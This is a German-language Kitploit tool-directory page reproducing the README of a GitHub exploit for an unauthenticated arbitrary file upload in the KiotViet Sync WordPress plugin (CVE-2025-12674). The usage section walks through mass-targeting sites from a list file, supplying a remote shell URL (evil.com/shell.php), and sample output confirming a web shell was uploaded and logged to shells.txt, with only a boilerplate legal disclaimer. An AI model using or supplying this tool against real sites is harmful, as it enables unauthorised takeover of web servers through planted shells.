Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-12674 — KiotViet Sync <= 1.8.5 - Nicht authentifizierter beliebiger Datei-Upload | Kitploit
Tools/GitHubGitHub/nxploited/cve-2025-12674
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubnxploited/cve-2025-12674

CVE-2025-12674

KiotViet Sync <= 1.8.5 - Nicht authentifizierter beliebiger Datei-Upload

Repository anzeigen
21vor 7 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-12674

KiotViet Sync <= 1.8.5 - Nicht authentifizierter Upload beliebiger Dateien

🐚 KiotViet Sync <= 1.8.5 - Nicht authentifizierter Upload beliebiger Dateien


📝 Beschreibung

Das KiotViet Sync-Plugin für WordPress (Versionen bis einschließlich 1.8.5) ist anfällig für das Hochladen beliebiger Dateien, da die Dateityp-Validierung in der Funktion create_media() fehlt.
Diese Schwachstelle ermöglicht es nicht authentifizierten Angreifern, beliebige Dateien auf den Server hochzuladen, was zu Remote-Codeausführung führen kann.

  • CVE: CVE-2025-12674
  • CVSS: 9.8 (Kritisch)

🚀 Verwendung

  1. Dieses Repository klonen oder das Skript herunterladen.

  2. Ziele vorbereiten:
    Ein Ziel pro Zeile in einer Datei namens list.txt platzieren.

    root@kitploit:~
    example.com
    site2.com
    http://site3.com
    
  3. Das Exploit-Skript ausführen:
    Der Name des Skripts lautet:

    root@kitploit:~
    CVE-2025-12674.py
    
    root@kitploit:~
    python3 CVE-2025-12674.py
    
  4. Bei Aufforderung die eigenen Optionen eingeben:

    root@kitploit:~
    Enter targets file name (default: list.txt): list.txt
    Enter number of threads (default: 10): 
    Enter REMOTE SHELL URL (direct link): http://evil.com/shell.php
    ╭──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
    │ Loaded 1 targets. Threads: 10.                                                                                           │
    ╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
    ╭──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
    │ http://nxk.ddev.site                                                                                                     │
    │ Trying KiotViet exploit...                                                                                               │
    ╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
    ╔══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════╗
    ║ ✔ Shell uploaded!                                                                                                        ║
    ║ Check here:                                                                                                              ║
    ║ http://nxk.ddev.site/wp-content/uploads/2026/01/                                                                         ║
    ║                                                                                                                          ║
    ╚══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════╝
               Summary           
                                 
      Metric              Value  
     ─────────────────────────── 
      Total attempts          1  
      Successful shells       1  
      Failed attempts         0  
    
  • Das Ausgabeverzeichnis für die hochgeladene Shell zeigt den Dateinamen nicht an (da dieser dynamisch generiert wird).

📂 Ausgabe

  • Alle erfolgreichen Shell-Pfade werden in shells.txt gespeichert.
  • Sicherungskopien der Ausgabe werden automatisch mit Zeitstempeln erstellt.

⚠️ Haftungsausschluss

Dieses Skript dient ausschließlich zu Bildungszwecken und für autorisierte Sicherheitstests.
Die unbefugte Verwendung gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben, ist illegal und unethisch.
Der Autor übernimmt keine Haftung für Missbrauch oder für verursachte Schäden.


👤 Autor

Nxploited (Khaled Alenazi)

Tool herunterladen